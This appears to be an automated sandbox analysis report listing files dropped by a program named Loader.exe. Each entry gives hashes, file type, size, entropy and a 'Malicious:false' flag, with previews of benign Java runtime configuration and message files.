                                                                                                                                                                                                                                                                                                              SSDEEP:768:Okt1MVMrA9/Klzwz9UyCgMUt9onPs3h3nVt83OndMY7dmMpAnC70N:Oo1oMQ/CrPa3VWO+gdmMW6q
                                                                                                                                                                                                                                                                                                              MD5:DE2167A880207BBF7464BCD1F8BC8657
                                                                                                                                                                                                                                                                                                              SHA1:0FF7A5EA29C0364A1162A090DFFC13D29BC3D3C7
                                                                                                                                                                                                                                                                                                              SHA-256:FD856EA783AD60215CE2F920FCB6BB4E416562D3C037C06D047F1EC103CD10B3
                                                                                                                                                                                                                                                                                                              SHA-512:BB83377C5CFF6117CEC6FBADF6D40989CE1EE3F37E4CEBA17562A59EA903D8962091146E2AA5CC44CFDDDF280DA7928001EEA98ABF0C0942D69819B2433F1322
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):21568
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.4868701533420925
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:uVI9/tEAHVvfiqiW9LEiGTHb6hVXbS7fLsD5bGGNET7T7T7T7JyFoynPV5hgGLVt:uVI9/yA9f1iW9LEiGTHb6hVXbS7QbGG9
                                                                                                                                                                                                                                                                                                              MD5:7C2959F705B5493A9701FFD9119C5EFD
                                                                                                                                                                                                                                                                                                              SHA1:5A52D57D1B96449C2B40A82F48DE2419ACA944C3
                                                                                                                                                                                                                                                                                                              SHA-256:596F89E7E5D9AC2B1F97FA36A20A7405C1CC41A9FCBA96DB089ADA4550131B24
                                                                                                                                                                                                                                                                                                              SHA-512:B7B48BD14701F75B9018BEDEE5A4CFCEBDAC342F83339FB3F1EFB7855598474C9D1CC993B5D4ADD3326140435087D2BD7CBBC18BC76C64EAD6234A9A7D57C552
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):163904
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.508553433039132
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:onzJtwzsrYx6cY+90AiVrM5muIqltkt7maRoM/X1fJqO0NJT:onttwzsrYxTaVVY5muIq3mx/X1fcb
                                                                                                                                                                                                                                                                                                              MD5:A63387A1BFDF760575B04B7BFD57FF89
                                                                                                                                                                                                                                                                                                              SHA1:9384247599523D97F40B973A00EE536848B1D76F
                                                                                                                                                                                                                                                                                                              SHA-256:5DF5B7E6EFCC345DDC8448AFC707B666F5F696F554B00ACA64D8E23EDBC176BF
                                                                                                                                                                                                                                                                                                              SHA-512:CB3A6A394424345FFA076E0BE58F284A0E4DB6FBFCE02D93FB4871D350A7FA1E673175AE988C26453DB1C983C0D06A01DD413DE47031BB4BF308CAAF3513C36F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):69696
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.89860109289213
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:ZCghp1EJqcGdjandlraksIOwIOpVnToIft4tpgO6:/142jUhimp9TBft4tqO6
                                                                                                                                                                                                                                                                                                              MD5:CB99B83BBC19CD0E1C2EC6031D0A80BC
                                                                                                                                                                                                                                                                                                              SHA1:927E1E24FD19F9CA8B5191EF3CC746B74AB68BCD
                                                                                                                                                                                                                                                                                                              SHA-256:68148243E3A03A3A1AAF4637F054993CB174C04F6BD77894FE84D74AF5833BEC
                                                                                                                                                                                                                                                                                                              SHA-512:29C4978FA56F15025355CE26A52BDF8197B8D8073A441425DF3DFC93C7D80D36755CC05B6485DD2E1F168DF2941315F883960B81368E742C4EA8E69DD82FA2BA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):155
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.618267268558291
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:nSkoZgZLXnuWxVEsTwVAAiuKIn7IRAdSPGGzJ0vwQAnfMaAHCRyvy:nBcAPWEwVAkIiSPhwwpkaAHCIa
                                                                                                                                                                                                                                                                                                              MD5:9E5E954BC0E625A69A0A430E80DCF724
                                                                                                                                                                                                                                                                                                              SHA1:C29C1F37A2148B50A343DB1A4AA9EB0512F80749
                                                                                                                                                                                                                                                                                                              SHA-256:A46372B05CE9F40F5D5A775C90D7AA60687CD91AAA7374C499F0221229BF344E
                                                                                                                                                                                                                                                                                                              SHA-512:18A8277A872FB9E070A1980EEE3DDD096ED0BBA755DB9B57409983C1D5A860E9CBD3B67E66FF47852FE12324B84D4984E2F13859F65FABE2FF175725898F1B67
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# Load the Java Access Bridge class into the JVM..#..#assistive_technologies=com.sun.java.accessibility.AccessBridge..#screen_magnifier_present=true....
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1438
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.214662998532387
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:QVDpdQYHLOVhl86bePCkHUMCLC9TFcgg+DR+Oby:MQ4LOVh2WGfUMCLC9Zcgg2Ru
                                                                                                                                                                                                                                                                                                              MD5:92BA2D87915E6F7F58D43344DF07E1A6
                                                                                                                                                                                                                                                                                                              SHA1:872BC54E53377AAC7C7616196BCCE1DB6A3F0477
                                                                                                                                                                                                                                                                                                              SHA-256:68F0CF30429A42A6FE78B1DE91970E5C78FD03D1599BEB080C1C196D5C59E4C0
                                                                                                                                                                                                                                                                                                              SHA-512:A964E2CEB4D601FAF28ECF13FB11777B70708C21CF9EA23721E462B6E911051108B8A42EBF6447FA49CB61D7FA2D79475F50EE791F1121616371E2B02FAB71B6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# Copyright (c) 2005, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..# Japanese imperial calendar..#..# Meiji since 1868-01-01 00:00:00 local time (Gregorian)..# Taisho since 1912-07-30 00:00:00 local time (Gregorian)..# Showa since 1926-12-25 00:00:00 local time (Gregorian)..# Heisei since 1989-01-08 00:00:00 local time (Gregorian)..calendar.japanese.type: LocalGregorianCalendar..calendar.japanese.eras: \...name=Meiji,abbr=M,since=-3218832000000; \...name=Taisho,abbr=T,since=-1812153600000; \...name=Showa,abbr=S,since=-1357603200000; \...name=Heisei,abbr=H,since=600220800000....#..# Taiwanese calendar..# Minguo since 1911-01-01 00:00:00 local time (Gregorian)..calendar.taiwanese.type: LocalGregorianCalendar..calendar.taiwanese.eras: \...name=MinGuo,since=-1830384000000....#..# Thai Buddhist calendar..# Buddhist Era since -5
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3091908
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.633254981822853
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:49152:puZi4j4TQkgaSOHEhjy2twRYEc1sJzlbguMuD:puZiW4smxGocuJlbgq
                                                                                                                                                                                                                                                                                                              MD5:0B3923ABB0D48FDAE7A2306717967B39
                                                                                                                                                                                                                                                                                                              SHA1:0882294FFEC2769023AA36FF9CC53562F8E26020
                                                                                                                                                                                                                                                                                                              SHA-256:E88AEC2A49F07CAC9471D9E4C113FA189600B57245685814D043C20EA8A8B471
                                                                                                                                                                                                                                                                                                              SHA-512:CF622081B290140CE8419B30FB25442F7204C9A37E1490030A4D656F66C509946F48C50CC7794DA51007EFB202805605FE3C2AC3534D63FBF928EA35CE16A040
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):84355
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.927199323446014
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:4X/nxfn5rxLyMznYolTzlff5OK3COHoHNG5rb/cxNwmCX1g86K2oWdAqNqc+KMjD:qxn5rxLyMzbf5OK3CJNG51g86A
                                                                                                                                                                                                                                                                                                              MD5:7FC71A62D85CCF12996680A4080AA44E
                                                                                                                                                                                                                                                                                                              SHA1:199DCCAA94E9129A3649A09F8667B552803E1D0E
                                                                                                                                                                                                                                                                                                              SHA-256:01FE24232D0DBEFE339F88C44A3FD3D99FF0E17AE03926CCF90B835332F5F89C
                                                                                                                                                                                                                                                                                                              SHA-512:B0B9B486223CF79CCF9346AAF5C1CA0F9588247A00C826AA9F3D366B7E2EF905AF4D179787DCB02B32870500FD63899538CF6FAFCDD9B573799B255F658CEB1D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:java/lang/Object..java/lang/String..java/io/Serializable..java/lang/Comparable..java/lang/CharSequence..java/lang/Class..java/lang/reflect/GenericDeclaration..java/lang/reflect/AnnotatedElement..java/lang/reflect/Type..java/lang/Cloneable..java/lang/ClassLoader..java/lang/System..java/lang/Throwable..java/lang/Error..java/lang/ThreadDeath..java/lang/Exception..java/lang/RuntimeException..java/lang/SecurityManager..java/security/ProtectionDomain..java/security/AccessControlContext..java/security/SecureClassLoader..java/lang/ClassNotFoundException..java/lang/ReflectiveOperationException..java/lang/NoClassDefFoundError..java/lang/LinkageError..java/lang/ClassCastException..java/lang/ArrayStoreException..java/lang/VirtualMachineError..java/lang/OutOfMemoryError..java/lang/StackOverflowError..java/lang/IllegalMonitorStateException..java/lang/ref/Reference..java/lang/ref/SoftReference..java/lang/ref/WeakReference..java/lang/ref/FinalReference..java/lang/ref/PhantomReference..sun/misc/Cleaner
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Sun KCMS color profile 2.0, type KCMS, XYZ/XYZ-spac device, 51236 bytes, 2-12-1997 18:50:04, dependently, PCS X=0xf6b3 Z=0xd2f8 "XYZ to XYZ Identity Profile"
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):51236
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.226972359973779
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:2Qnt0y7xFNksbeCqY39JJ8GmaNo68GmaNo68GmaNoW:JOy7xXjtqYNfHxNo6HxNo6HxNoW
                                                                                                                                                                                                                                                                                                              MD5:10F23396E21454E6BDFB0DB2D124DB85
                                                                                                                                                                                                                                                                                                              SHA1:B7779924C70554647B87C2A86159CA7781E929F8
                                                                                                                                                                                                                                                                                                              SHA-256:207D748A76C10E5FA10EC7D0494E31AB72F2BACAB591371F2E9653961321FE9C
                                                                                                                                                                                                                                                                                                              SHA-512:F5C5F9FC3C4A940D684297493902FD46F6AA5248D2B74914CA5A688F0BAD682831F6060E2264326D2ECB1F3544831EB1FA029499D1500EA4BFE3B97567FE8444
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Sun KCMS color profile 2.0, type KCMS, GRAY/XYZ-mntr device, KODA/GRAY model, 632 bytes, 27-7-95 17:30:15, embedded, relative colorimetric, PCS Z=0xd32b "KODAK Grayscale Conversion - Gamma 1.0"
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):632
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7843698642539243
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:51AP3fJgXQ531yqQac/lkgz42WlHlYujlOl9Fhl:vA2XQCqpUlkgzulHiXl3hl
                                                                                                                                                                                                                                                                                                              MD5:1002F18FC4916F83E0FC7E33DCC1FA09
                                                                                                                                                                                                                                                                                                              SHA1:27F93961D66B8230D0CDB8B166BC8B4153D5BC2D
                                                                                                                                                                                                                                                                                                              SHA-256:081CAAC386D968ADD4C2D722776E259380DCF78A306E14CC790B040AB876D424
                                                                                                                                                                                                                                                                                                              SHA-512:334D932D395B46DFC619576B391F2ADC2617E345AFF032B592C25E333E853735DA8B286EF7542EB19059CDE8215CDCEA147A3419ED56BDD6006CA9918D0618E1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:color profile 2.0, type KCMS, RGB/XYZ-mntr device by KODK, 1044 bytes, 2-2-1998, PCS Z=0xd32c "linear sRGB"
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1044
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.510788634170065
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:zwuau/7De0/q98EAsBIMD/WvaKIV4R0/lCAEdD0WlV9AEdwKKt/n3knR3lfR/NHD:zw7ePB/rEAsBIkVuUlAYKu/nUnKw
                                                                                                                                                                                                                                                                                                              MD5:A387B65159C9887265BABDEF9CA8DAE5
                                                                                                                                                                                                                                                                                                              SHA1:7913274C2F73BAFCF888F09FF60990B100214EDE
                                                                                                                                                                                                                                                                                                              SHA-256:712036AA1951427D42E3E190E714F420CA8C2DD97EF01FCD0675EE54B920DB46
                                                                                                                                                                                                                                                                                                              SHA-512:359D9B57215855F6794E47026C06036B93710998205D0817C6E602B2A24DAEB92537C388F129407461FC60180198F02A236AEB349A17430ED7AC85A1E5F71350
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Sun KCMS color profile 2.0, type KCMS, 3CLR/Lab-spac device, 274474 bytes, 6-11-1996 7:50:04, PCS X=0xf6b3 Z=0xd2f8 "Std Photo YCC Print"
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):274474
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.843290819622709
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:nJleRNRyAnAqNaADEJHeeeeevoAuaiqwV6sg0pUjRVgYgI:nJleRNRpN0j3qhjRC9I
                                                                                                                                                                                                                                                                                                              MD5:24B9DEE2469F9CC8EC39D5BDB3901500
                                                                                                                                                                                                                                                                                                              SHA1:4F7EED05B8F0EEA7BCDC8F8F7AAEB1925CE7B144
                                                                                                                                                                                                                                                                                                              SHA-256:48122294B5C08C69B7FE1DB28904969DCB6EDC9AA5076E3F8768BF48B76204D0
                                                                                                                                                                                                                                                                                                              SHA-512:D23CE2623DE400216D249602486F21F66398B75196E80E447143D058A07438919A78AE0ED2DDF8E80D20BD70A635D51C9FB300E9F08A4751E00CD21883B88693
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Microsoft color profile 2.1, type Lino, RGB/XYZ-mntr device, IEC/sRGB model by HP, 3144 bytes, 9-2-1998 6:49:00 "sRGB IEC61966-2.1"
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3144
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.026867070945169
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:+FflsXlf/lulel4wlwx+6MjnNsvIYWiR5QkyTJbZPHXZ9u6gbVwyKzJgWjU:aN26MT0D5MdtbZPAVwzV0
                                                                                                                                                                                                                                                                                                              MD5:1D3FDA2EDB4A89AB60A23C5F7C7D81DD
                                                                                                                                                                                                                                                                                                              SHA1:9EAEA0911D89D63E39E95F2E2116EAEC7E0BB91E
                                                                                                                                                                                                                                                                                                              SHA-256:2B3AA1645779A9E634744FAF9B01E9102B0C9B88FD6DECED7934DF86B949AF7E
                                                                                                                                                                                                                                                                                                              SHA-512:16AAE81ACF757036634B40FB8B638D3EBA89A0906C7F95BD915BC3579E3BE38C7549EE4CD3F344EF0A17834FF041F875B9370230042D20B377C562952C47509B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):5824
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.074440246603207
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:6M5VfH+uEMmPDkZeujdJfZUB8BB/+PhPXsOQ71GAXf5lZuU1EbWF7Ycx/AQ12a8T:6M6p4ZeWd1ZUB8BBGPhPXsOQ71GAXBly
                                                                                                                                                                                                                                                                                                              MD5:95AE170D90764B3F5E68C72E8C518DDC
                                                                                                                                                                                                                                                                                                              SHA1:1939B699D16A5DB3E3F905466222099D7C29285A
                                                                                                                                                                                                                                                                                                              SHA-256:A2B31E9CBCEAB296A5E1CF056EFD953CED23B888CD929B0BBE6EB6B53D2BF861
                                                                                                                                                                                                                                                                                                              SHA-512:87E970BEAC8141C757D622FC8B6D84FE173EA4B134AFD8E2F979714C1110C3D92F3CE5F2B9DC74804DD37D13AB2A0EDF0FCA242F61CF8ED065AE81B7331F8816
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#sun.net.www MIME content-types table..#..# Property fields:..#..# <description> ::= 'description' '=' <descriptive string>..# <extensions> ::= 'file_extensions' '=' <comma-delimited list, include '.'>..# <image> ::= 'icon' '=' <filename of icon image>..# <action> ::= 'browser' | 'application' | 'save' | 'unknown'..# <application> ::= 'application' '=' <command line template>..#....#..# The "we don't know anything about this data" type(s)...# Used internally to mark unrecognized types...#..content/unknown: description=Unknown Content..unknown/unknown: description=Unknown Data Type....#..# The template we should use for temporary files when launching an application..# to view a document of given type...#..temp.file.template: c:\\temp\\%s....#..# The "real" types...#..application/octet-stream: \...description=Generic Binary Stream;\...file_extensions=.saveme,.dump,.hqx,.arc,.obj,.lib,.bin,.exe,.zip,.gz....application/oda: \...description=ODA Document;\...file_extens
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4122
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2585384283455134
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:BlWxFFGFSupi94blATFxjGph5vLC6/w37ZXQTbVm/eVzOBJ:BlWJEi94blAT+ph5vLkApmGqr
                                                                                                                                                                                                                                                                                                              MD5:F6258230B51220609A60AA6BA70D68F3
                                                                                                                                                                                                                                                                                                              SHA1:B5B95DD1DDCD3A433DB14976E3B7F92664043536
                                                                                                                                                                                                                                                                                                              SHA-256:22458853DA2415F7775652A7F57BB6665F83A9AE9FB8BD3CF05E29AAC24C8441
                                                                                                                                                                                                                                                                                                              SHA-512:B2DFCFDEBF9596F2BB05F021A24335F1EB2A094DCA02B2D7DD1B7C871D5EECDA7D50DA7943B9F85EDB5E92D9BE6B6ADFD24673CE816DF3960E4D68C7F894563F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2282861
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.951223313727943
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:49152:ABSxAmHHJwEu4l3Dyz7oQHeNHJJ2aAvfZc:ABEtHHaEuI3Dy3oQH2pFAvW
                                                                                                                                                                                                                                                                                                              MD5:2388C4C8D5F95E0379A8997C7C2492F4
                                                                                                                                                                                                                                                                                                              SHA1:906BF87EB1D8881ABADBF93A3C4BBA7887CA2A01
                                                                                                                                                                                                                                                                                                              SHA-256:A1FD508EACF76645EB0885B243B5DD14239F1E039E8B53ED038226DF91A30539
                                                                                                                                                                                                                                                                                                              SHA-512:2CCE11A5F97DF842964B55408FCF1EC84C0CD561E664ABA3A51275EAFE59D7C920FCFD954C527DA4D53ACB191200CC64BF8150A33BCB9B038F36ADB2CC69B1A1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):14156
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.649187440261259
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:E84SHTDIbZI+R9ufdITe3MPu20DguN9P5YOinvYrJJ0JKP/U8HtK8NJO8lJi8VJb:kld6uQZ9P5dTC7IjZUkPmpaemFqKs8n
                                                                                                                                                                                                                                                                                                              MD5:91052ADB799AEF68EA76931997C40CE4
                                                                                                                                                                                                                                                                                                              SHA1:19255B8E335C22A171C26148099191708C99EE7A
                                                                                                                                                                                                                                                                                                              SHA-256:61D1382375238F90E2E4EE2AF985D978F1409E01B38080E710DF4ACB2897E63B
                                                                                                                                                                                                                                                                                                              SHA-512:39BAA49A1CEF533E5D3FFF1A86BC72CB346A6BF1928A9D8B505EBA09A4AB1506400234DE78BDFD925821F0A690B8887BD004A18CC64337DEB666CC2509DEE5DA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........$..H............'...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/UT....GjW.GjWux.............PK........#..H................{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/UT....GjW.GjWux.............PK........#..H............6...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/UT....GjW.GjWux.............PK........#..H............>...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/ffjcext/UT....GjW.GjWux.............PK........#..H...V........H...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/ffjcext/ffjcext.jsUT....GjW.GjWux.............const gJavaConsole1_8_0_101 = {...id.: "javaconsole1.8.0_101",...mimeType: "application/x-java-applet;jpi-version=1.8.0_101",...install.: function() {...window.addEventListener("load",this.init,false);..},...init.: function() { ...if (navigator.mimeTypes[gJavaConsole1_8_0_101.mimeType]) {....var toolsPopup = document.getElementById("menu_ToolsPopup");.....toolsPopup.addEventListener("popupshowing",gJavaConsole1_8_0_101.enable,false)
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2917
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.838706790124659
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:KaDMJ9TmsHDmDDCDP2un8YzgKe1E13Tstub22tTeF/Qi/WRtAXikTzgaENZzT3JI:KaD+9TmAe29vBotubbt2Oz+ENlbJI
                                                                                                                                                                                                                                                                                                              MD5:2EB9117D147BAA0578E4000DA9B29E12
                                                                                                                                                                                                                                                                                                              SHA1:3D297ECF3D280D4AA3D1423E885994495243F326
                                                                                                                                                                                                                                                                                                              SHA-256:B8D9C69FF7F4832A9B365D4A43CF66DFF9847051752B13EEDF024CAA9C1EF46B
                                                                                                                                                                                                                                                                                                              SHA-512:C3F7730767941B3C8F6F53D4686E9F898D1907D978F6D1FA35BA02C3FCD8306335406A5F9ABAA844F27F7AFD9E548810BECB9EC3E6B84888EA5EAC57B6ED6FDB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=internal error, unknown message..error.badinst.nojre=Bad installation. No JRE found in configuration file..error.launch.execv=Error encountered while invoking Java Web Start (execv)..error.launch.sysexec=Error encountered while invoking Java Web Start (SysExec) ..error.listener.failed=Splash: sysCreateListenerSocket failed..error.accept.failed=Splash: accept failed..error.recv.failed=Splash: recv failed..error.invalid.port=Splash: didn't revive a valid port..error.read=Read past end of buffer..error.xmlparsing=XML Parsing error: wrong kind of token found..error.splash.exit=Java Web Start splash screen process exiting .....\n..# "Last WinSock Error" means the error message for the last operation that failed...error.winsock=\tLast WinSock Error: ..error.winsock.load=Couldn't load winsock.dll..error.winsock.start
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1345), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3338
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.919780187496773
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:WvaqyL1nlrDtzh5+VN9JrnjXyv6jq/YgKe1h/KZkCUdr5pAvA1t2CPTOsdIamy:txrj5Snk6+wuir25pAvAv2ITOsd9
                                                                                                                                                                                                                                                                                                              MD5:FF9CFEE1ACFCD927253A6E35673F1BB7
                                                                                                                                                                                                                                                                                                              SHA1:957E6609A1AF6D06A45A6F7B278BE7625807B909
                                                                                                                                                                                                                                                                                                              SHA-256:E130FBD5FA378A380F46F42981F2C97BC152059C27120204AB4DA47079D31513
                                                                                                                                                                                                                                                                                                              SHA-512:F42601092436D7AF30CCD81126185232D9D643B195D3D4619AEC451E3E2A60E33E6378E770DD1A4CDF7AB20CB749371665A992CA73D2842A7102F3FB34B6B9EB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=interner Fehler, unbekannte Meldung..error.badinst.nojre=Ung\u00FCltige Installation. Keine JRE in Konfigurationsdatei gefunden..error.launch.execv=Fehler beim Aufrufen von Java Web Start (execv) aufgetreten..error.launch.sysexec=Fehler beim Aufrufen von Java Web Start (SysExec) aufgetreten..error.listener.failed=Startbildschirm: sysCreateListenerSocket nicht erfolgreich..error.accept.failed=Startbildschirm: accept nicht erfolgreich..error.recv.failed=Startbildschirm: recv nicht erfolgreich..error.invalid.port=Startbildschirm: Reaktivierung eines g\u00FCltigen Ports nicht m\u00F6glich..error.read=\u00DCber Pufferende hinaus gelesen..error.xmlparsing=XML-Parsefehler: Falscher Tokentyp gefunden..error.splash.exit=Prozess f\u00FCr Startbildschirm von Java Web Start wird beendet.....\n..# "Last WinSock Error" mean
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1475), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3632
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.776451902180833
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
